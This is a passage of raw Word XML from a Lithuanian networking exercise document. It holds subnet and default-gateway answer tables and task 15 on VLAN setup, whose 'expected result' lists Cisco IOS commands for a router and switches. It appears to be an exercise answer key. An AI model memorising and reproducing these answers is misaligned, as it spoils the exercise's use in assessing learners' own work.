              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>192.168.30.0/25</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="1BBEE78B" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1971" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="704A5F60" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Tinklo kaukės IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1514" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7039E15B" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>255.255.255.224</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1515" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="77874715" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>255.255.255.128</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="64A09E0A" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1971" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="05C57D2A" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Broadcast IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1514" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="045F7A8B" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>192.168.30.31</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1515" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5DECE882" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>192.168.30.127</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="7F715BDF" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1971" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="00DBC52C" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Pirmas Host IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1514" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0A27CCCE" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>192.168.30.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1515" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="33E8A792" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>192.168.30.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0025204D" w:rsidRPr="005A5C28" w14:paraId="410F5177" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1971" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3ADE7BAD" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Paskutinis Host IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1514" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="043B6F3F" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>192.168.30.30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1515" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="77277DBA" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>192.168.30.126</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="03B516AE" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5533B985" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Kokius Default Gateway IP adresus parinkote tinklams D, E, F?</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3925"/>
        <w:gridCol w:w="5986"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="637EE4D3" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="3C6118E1" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:left="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Tinklas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="7404495A" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:left="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Default Gateway</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="4852D04F" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="161D587C" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:left="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>D</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7ED83AC0" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:left="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>192.168.10.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="047C8894" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2C0E4A95" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:left="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>E</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3B4FEE7A" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:left="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>192.168.20.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0025204D" w:rsidRPr="005A5C28" w14:paraId="6B461239" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="38904978" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:left="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>F</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="125F40CF" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:left="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>192.168.30.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7A360A6B" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78C1A7F9" w14:textId="77777777" w:rsidR="00C25BA0" w:rsidRPr="005A5C28" w:rsidRDefault="00C25BA0"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15 užduotis. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>VLAN</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>TINKLO SUDARYMAS IR KONFIGŪRAVIMAS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1012F412" w14:textId="6625C703" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D"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ATSAKYMAS</w:t>
      </w:r>
      <w:r w:rsidR="00DC0673" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002E626A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00DC0673" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002E626A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>LAUKIAMAS REZULTATAS</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4955"/>
        <w:gridCol w:w="4956"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="5E54C3F7" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4955" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B7F2BB2"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Maršrutizatorius R0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4956" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78BBF938"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Komutatorius S0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="0168ADA8" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4955" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74EEC6D9"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Router&gt;enable</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="074F7729"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Router#configure terminal</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E9B0AFB"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Router(config)#hostname R0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D0103AA"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R0(config)#no ip domain-lookup</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5AF691B5"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R0(config)#interface FastEthernet0/0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4040BDD2"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R0(config-if)#ip address 172.17.10.254 255.255.255.0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0EBEFECE"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R0(config-if)#no shutdown</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5041CC53"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R0(config-if)#exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07485B6E"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R0(config)#interface FastEthernet1/0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DE8452D"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R0(config-if)#ip address 172.17.20.254 255.255.255.0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52B2D4B8"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R0(config-if)#no shutdown</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31977CF9"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R0(config-if)#exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BA2260A"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R0(config)#interface FastEthernet2/0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="369A0F59"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R0(config-if)#ip address 172.17.30.254 255.255.255.0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F4B8845"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R0(config-if)#no shutdown</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4956" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1FB7AF16"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witch&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64C4A7AC"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witch&gt;enable</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="676152AA"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witch#configure terminal</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BAD3427"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witch(config)#hostname S0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5EB68153"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no ip domain-lookup</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A8C4018"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interface vlan 1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1183A4A0"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if)#ip address 172.17.10.1 255.255.255.0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="024F41AE"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if)#no shutdown</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3597627D"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vlan)#exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BAA2AAF"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ip default-gateway 172.17.10.254</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A343AD1"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vlan 10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60C12317"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vlan)#name Staff</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C6C07EA"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vlan)#exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07787EB1"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vlan 20</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34A10852"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vlan)#name Stud</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20C8F839"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vlan)#exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58E772A8"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vlan 30</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4226699A"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vlan)#name Guest</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56AE193A"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vlan)#exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="700AAF91"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interface FastEthernet0/1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64FE4449"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if)#switchport access vlan 10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="098E930B"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if)#exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DABBD66"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interface FastEthernet0/2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="008DD8EF"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if)#switchport access vlan 10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CC80B5C"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0(config-if)#exit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="5A9AB280" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4955" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27DAADD2"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Komutatorius S1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4956" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B4B1614"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Komutatorius S2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E40BC" w:rsidRPr="005A5C28" w14:paraId="42528769" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4955" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7BBEC7A7"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witch&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60FE5072"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witch&gt;enable</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17610C25"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witch#configure terminal</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="011B9C0C"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witch(config)#hostname S1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B3E191B"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no ip domain-lookup</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3855E2BF"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interface vlan 1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51E898BB"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if)#ip address 172.17.20.1 255.255.255.0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63383046"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if)#no shutdown</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DA0CE4F"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vlan)#exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D17A796"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ip default-gateway 172.17.20.254</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F84D4C6"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vlan 10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15E37B03"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vlan)#name Staff</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52F2D5B7"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vlan)#exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48FDAD17"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vlan 20</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46E61C81"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vlan)#name Stud</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04E04FD7"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vlan)#exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C63AFD1"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vlan 30</w:t>
            </w:r>
          </w:p>
